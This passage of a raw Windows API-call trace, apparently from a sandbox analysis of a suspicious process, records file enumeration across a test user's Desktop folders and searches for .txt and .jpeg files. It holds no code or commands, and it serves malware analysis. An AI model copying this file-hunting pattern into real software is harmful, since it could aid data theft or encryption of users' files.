lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf1a0 [0063.262] FindNextFileW (in: hFindFile=0x9bf1a0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.263] FindNextFileW (in: hFindFile=0x9bf1a0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a026230, ftCreationTime.dwHighDateTime=0x1d5c8dc, ftLastAccessTime.dwLowDateTime=0xce447400, ftLastAccessTime.dwHighDateTime=0x1d5d6f2, ftLastWriteTime.dwLowDateTime=0xce447400, ftLastWriteTime.dwHighDateTime=0x1d5d6f2, nFileSizeHigh=0x0, nFileSizeLow=0x619e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5E4_Kcg6cqpR-gwb.swf", cAlternateFileName="5E4_KC~1.SWF")) returned 1 [0063.263] FindNextFileW (in: hFindFile=0x9bf1a0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb40900, ftCreationTime.dwHighDateTime=0x1d5d73f, ftLastAccessTime.dwLowDateTime=0xdb0cc290, ftLastAccessTime.dwHighDateTime=0x1d5d0cc, ftLastWriteTime.dwLowDateTime=0xdb0cc290, ftLastWriteTime.dwHighDateTime=0x1d5d0cc, nFileSizeHigh=0x0, nFileSizeLow=0x15772, dwReserved0=0x0, dwReserved1=0x0, cFileName="6xiRzqk0e.mp3", cAlternateFileName="6XIRZQ~1.MP3")) returned 1 [0063.263] FindNextFileW (in: hFindFile=0x9bf1a0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf01d96e0, ftCreationTime.dwHighDateTime=0x1d5d6ea, ftLastAccessTime.dwLowDateTime=0x726bd8e0, ftLastAccessTime.dwHighDateTime=0x1d5c85a, ftLastWriteTime.dwLowDateTime=0x726bd8e0, ftLastWriteTime.dwHighDateTime=0x1d5c85a, nFileSizeHigh=0x0, nFileSizeLow=0xbe65, dwReserved0=0x0, dwReserved1=0x0, cFileName="FisMdRNWBNOEJ4Av.swf", cAlternateFileName="FISMDR~1.SWF")) returned 1 [0063.263] FindNextFileW (in: hFindFile=0x9bf1a0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7febd840, ftCreationTime.dwHighDateTime=0x1d5d678, ftLastAccessTime.dwLowDateTime=0x2be003f0, ftLastAccessTime.dwHighDateTime=0x1d5d729, ftLastWriteTime.dwLowDateTime=0x2be003f0, ftLastWriteTime.dwHighDateTime=0x1d5d729, nFileSizeHigh=0x0, nFileSizeLow=0x7812, dwReserved0=0x0, dwReserved1=0x0, cFileName="JFBPLC7ZEPj.ppt", cAlternateFileName="JFBPLC~1.PPT")) returned 1 [0063.263] FindNextFileW (in: hFindFile=0x9bf1a0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd50430, ftCreationTime.dwHighDateTime=0x1d5d21c, ftLastAccessTime.dwLowDateTime=0xf6f6dab0, ftLastAccessTime.dwHighDateTime=0x1d5ce31, ftLastWriteTime.dwLowDateTime=0xf6f6dab0, ftLastWriteTime.dwHighDateTime=0x1d5ce31, nFileSizeHigh=0x0, nFileSizeLow=0x42b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="RJ4fo8BlUIkNkFgvJDB3.wav", cAlternateFileName="RJ4FO8~1.WAV")) returned 1 [0063.263] FindNextFileW (in: hFindFile=0x9bf1a0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 1 [0063.264] FindNextFileW (in: hFindFile=0x9bf1a0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 0 [0063.264] FindClose (in: hFindFile=0x9bf1a0 | out: hFindFile=0x9bf1a0) returned 1 [0063.264] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*.txt", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0063.264] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf380 [0063.264] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.264] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bda560, ftCreationTime.dwHighDateTime=0x1d5c954, ftLastAccessTime.dwLowDateTime=0xb7ba9f80, ftLastAccessTime.dwHighDateTime=0x1d5cd4b, ftLastWriteTime.dwLowDateTime=0xb7ba9f80, ftLastWriteTime.dwHighDateTime=0x1d5cd4b, nFileSizeHigh=0x0, nFileSizeLow=0x3271, dwReserved0=0x0, dwReserved1=0x0, cFileName="DOdivRJBTXgzUJ.wav", cAlternateFileName="DODIVR~1.WAV")) returned 1 [0063.264] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71fd8190, ftCreationTime.dwHighDateTime=0x1d5d3dd, ftLastAccessTime.dwLowDateTime=0x25c817f0, ftLastAccessTime.dwHighDateTime=0x1d5ce55, ftLastWriteTime.dwLowDateTime=0x25c817f0, ftLastWriteTime.dwHighDateTime=0x1d5ce55, nFileSizeHigh=0x0, nFileSizeLow=0xb4eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="E2jRFWUv.xlsx", cAlternateFileName="E2JRFW~1.XLS")) returned 1 [0063.265] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9298a40, ftCreationTime.dwHighDateTime=0x1d5cdc4, ftLastAccessTime.dwLowDateTime=0xb615c9a0, ftLastAccessTime.dwHighDateTime=0x1d5d360, ftLastWriteTime.dwLowDateTime=0xb615c9a0, ftLastWriteTime.dwHighDateTime=0x1d5d360, nFileSizeHigh=0x0, nFileSizeLow=0x68aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="krWg9z-VUaci.wav", cAlternateFileName="KRWG9Z~1.WAV")) returned 1 [0063.265] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5714a10, ftCreationTime.dwHighDateTime=0x1d5d59b, ftLastAccessTime.dwLowDateTime=0xafa97800, ftLastAccessTime.dwHighDateTime=0x1d5d2cf, ftLastWriteTime.dwLowDateTime=0xafa97800, ftLastWriteTime.dwHighDateTime=0x1d5d2cf, nFileSizeHigh=0x0, nFileSizeLow=0x10b8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="KsPC3.bmp", cAlternateFileName="")) returned 1 [0063.265] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0240, ftCreationTime.dwHighDateTime=0x1d5d7c3, ftLastAccessTime.dwLowDateTime=0x626ed2a0, ftLastAccessTime.dwHighDateTime=0x1d5ccb3, ftLastWriteTime.dwLowDateTime=0x626ed2a0, ftLastWriteTime.dwHighDateTime=0x1d5ccb3, nFileSizeHigh=0x0, nFileSizeLow=0xad34, dwReserved0=0x0, dwReserved1=0x0, cFileName="kZHWiDNy.mp4", cAlternateFileName="")) returned 1 [0063.265] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2d402a0, ftCreationTime.dwHighDateTime=0x1d5d269, ftLastAccessTime.dwLowDateTime=0x6cdeacf0, ftLastAccessTime.dwHighDateTime=0x1d5d1eb, ftLastWriteTime.dwLowDateTime=0x6cdeacf0, ftLastWriteTime.dwHighDateTime=0x1d5d1eb, nFileSizeHigh=0x0, nFileSizeLow=0xad19, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oo6K.m4a", cAlternateFileName="")) returned 1 [0063.265] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 1 [0063.265] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 0 [0063.265] FindClose (in: hFindFile=0x9bf380 | out: hFindFile=0x9bf380) returned 1 [0063.266] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*.txt", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0063.266] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x1e92de00, ftLastAccessTime.dwHighDateTime=0x1d5c853, ftLastWriteTime.dwLowDateTime=0x1e92de00, ftLastWriteTime.dwHighDateTime=0x1d5c853, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf440 [0063.266] FindNextFileW (in: hFindFile=0x9bf440, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x1e92de00, ftLastAccessTime.dwHighDateTime=0x1d5c853, ftLastWriteTime.dwLowDateTime=0x1e92de00, ftLastWriteTime.dwHighDateTime=0x1d5c853, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.266] FindNextFileW (in: hFindFile=0x9bf440, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1418d380, ftCreationTime.dwHighDateTime=0x1d5ca0b, ftLastAccessTime.dwLowDateTime=0x9be42560, ftLastAccessTime.dwHighDateTime=0x1d5d165, ftLastWriteTime.dwLowDateTime=0x9be42560, ftLastWriteTime.dwHighDateTime=0x1d5d165, nFileSizeHigh=0x0, nFileSizeLow=0x15674, dwReserved0=0x0, dwReserved1=0x0, cFileName="7HlCuwMi.pptx", cAlternateFileName="7HLCUW~1.PPT")) returned 1 [0063.267] FindNextFileW (in: hFindFile=0x9bf440, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58416d40, ftCreationTime.dwHighDateTime=0x1d5d368, ftLastAccessTime.dwLowDateTime=0x95e58810, ftLastAccessTime.dwHighDateTime=0x1d5d616, ftLastWriteTime.dwLowDateTime=0x95e58810, ftLastWriteTime.dwHighDateTime=0x1d5d616, nFileSizeHigh=0x0, nFileSizeLow=0x171e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="CZR-hhw59bi.bmp", cAlternateFileName="CZR-HH~1.BMP")) returned 1 [0063.267] FindNextFileW (in: hFindFile=0x9bf440, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbde6efb0, ftCreationTime.dwHighDateTime=0x1d5ca5f, ftLastAccessTime.dwLowDateTime=0x662319e0, ftLastAccessTime.dwHighDateTime=0x1d5cf99, ftLastWriteTime.dwLowDateTime=0x662319e0, ftLastWriteTime.dwHighDateTime=0x1d5cf99, nFileSizeHigh=0x0, nFileSizeLow=0x16745, dwReserved0=0x0, dwReserved1=0x0, cFileName="DN0hvZxxCeH-NYAF_H.png", cAlternateFileName="DN0HVZ~1.PNG")) returned 1 [0063.267] FindNextFileW (in: hFindFile=0x9bf440, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2ffd140, ftCreationTime.dwHighDateTime=0x1d5d3a0, ftLastAccessTime.dwLowDateTime=0xa565dfd0, ftLastAccessTime.dwHighDateTime=0x1d5c89f, ftLastWriteTime.dwLowDateTime=0xa565dfd0, ftLastWriteTime.dwHighDateTime=0x1d5c89f, nFileSizeHigh=0x0, nFileSizeLow=0xf21c, dwReserved0=0x0, dwReserved1=0x0, cFileName="dp gvQR2 MYwMzsW1yo.mkv", cAlternateFileName="DPGVQR~1.MKV")) returned 1 [0063.267] FindNextFileW (in: hFindFile=0x9bf440, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1afa9ca0, ftCreationTime.dwHighDateTime=0x1d5d768, ftLastAccessTime.dwLowDateTime=0x9e894010, ftLastAccessTime.dwHighDateTime=0x1d5d5cb, ftLastWriteTime.dwLowDateTime=0x9e894010, ftLastWriteTime.dwHighDateTime=0x1d5d5cb, nFileSizeHigh=0x0, nFileSizeLow=0xa84f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iCkvEIW.png", cAlternateFileName="")) returned 1 [0063.267] FindNextFileW (in: hFindFile=0x9bf440, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x434c9c30, ftCreationTime.dwHighDateTime=0x1d5cc28, ftLastAccessTime.dwLowDateTime=0x11453020, ftLastAccessTime.dwHighDateTime=0x1d5cfa8, ftLastWriteTime.dwLowDateTime=0x11453020, ftLastWriteTime.dwHighDateTime=0x1d5cfa8, nFileSizeHigh=0x0, nFileSizeLow=0x4dcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="kFQqlJY89ZuDyS.ppt", cAlternateFileName="KFQQLJ~1.PPT")) returned 1 [0063.267] FindNextFileW (in: hFindFile=0x9bf440, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5061a0, ftCreationTime.dwHighDateTime=0x1d5cd77, ftLastAccessTime.dwLowDateTime=0xf08f0a70, ftLastAccessTime.dwHighDateTime=0x1d5cd33, ftLastWriteTime.dwLowDateTime=0xf08f0a70, ftLastWriteTime.dwHighDateTime=0x1d5cd33, nFileSizeHigh=0x0, nFileSizeLow=0x2338, dwReserved0=0x0, dwReserved1=0x0, cFileName="luPvkk7BP6.m4a", cAlternateFileName="LUPVKK~1.M4A")) returned 1 [0063.267] FindNextFileW (in: hFindFile=0x9bf440, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 1 [0063.268] FindNextFileW (in: hFindFile=0x9bf440, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 0 [0063.268] FindClose (in: hFindFile=0x9bf440 | out: hFindFile=0x9bf440) returned 1 [0063.268] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*.txt", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0063.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feaa0) returned 1 [0063.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea60) returned 1 [0063.270] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0063.270] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0063.270] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8a1c27e, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x8a1c27e, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0063.270] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0063.270] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0063.270] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0063.270] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0063.270] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.jpeg", lpFindFileData=0x6fe880 | out: lpFindFileData=0x6fe880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0063.270] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8a1c27e, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x8a1c27e, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf260 [0063.270] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8a1c27e, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x8a1c27e, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.271] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e4518a0, ftCreationTime.dwHighDateTime=0x1d5c950, ftLastAccessTime.dwLowDateTime=0xc8577a40, ftLastAccessTime.dwHighDateTime=0x1d5c9d9, ftLastWriteTime.dwLowDateTime=0xc8577a40, ftLastWriteTime.dwHighDateTime=0x1d5c9d9, nFileSizeHigh=0x0, nFileSizeLow=0x3faa, dwReserved0=0x0, dwReserved1=0x0, cFileName="-yB2WD9ZHipl10.mkv", cAlternateFileName="-YB2WD~1.MKV")) returned 1 [0063.271] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe913c2c0, ftCreationTime.dwHighDateTime=0x1d5c821, ftLastAccessTime.dwLowDateTime=0x951b3080, ftLastAccessTime.dwHighDateTime=0x1d5cb10, ftLastWriteTime.dwLowDateTime=0x951b3080, ftLastWriteTime.dwHighDateTime=0x1d5cb10, nFileSizeHigh=0x0, nFileSizeLow=0x4b96, dwReserved0=0x0, dwReserved1=0x0, cFileName="0LCfOxpKhBY.mkv", cAlternateFileName="0LCFOX~1.MKV")) returned 1 [0063.271] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc7f6e50, ftCreationTime.dwHighDateTime=0x1d5c9da, ftLastAccessTime.dwLowDateTime=0x9744b650, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0x9744b650, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x67b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="63ZOACO2R_kPqlEG.m4a", cAlternateFileName="63ZOAC~1.M4A")) returned 1 [0063.271] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41d58d0, ftCreationTime.dwHighDateTime=0x1d5cc31, ftLastAccessTime.dwLowDateTime=0xef3f2c90, ftLastAccessTime.dwHighDateTime=0x1d5c9eb, ftLastWriteTime.dwLowDateTime=0xef3f2c90, ftLastWriteTime.dwHighDateTime=0x1d5c9eb, nFileSizeHigh=0x0, nFileSizeLow=0xe243, dwReserved0=0x0, dwReserved1=0x0, cFileName="6yMUE.flv", cAlternateFileName="")) returned 1 [0063.271] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4105fa60, ftCreationTime.dwHighDateTime=0x1d5cc92, ftLastAccessTime.dwLowDateTime=0x3135af40, ftLastAccessTime.dwHighDateTime=0x1d5c931, ftLastWriteTime.dwLowDateTime=0x3135af40, ftLastWriteTime.dwHighDateTime=0x1d5c931, nFileSizeHigh=0x0, nFileSizeLow=0x8f23, dwReserved0=0x0, dwReserved1=0x0, cFileName="7jATM.wav", cAlternateFileName="")) returned 1 [0063.271] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81d84fe0, ftCreationTime.dwHighDateTime=0x1d5ca4c, ftLastAccessTime.dwLowDateTime=0x349b2b0, 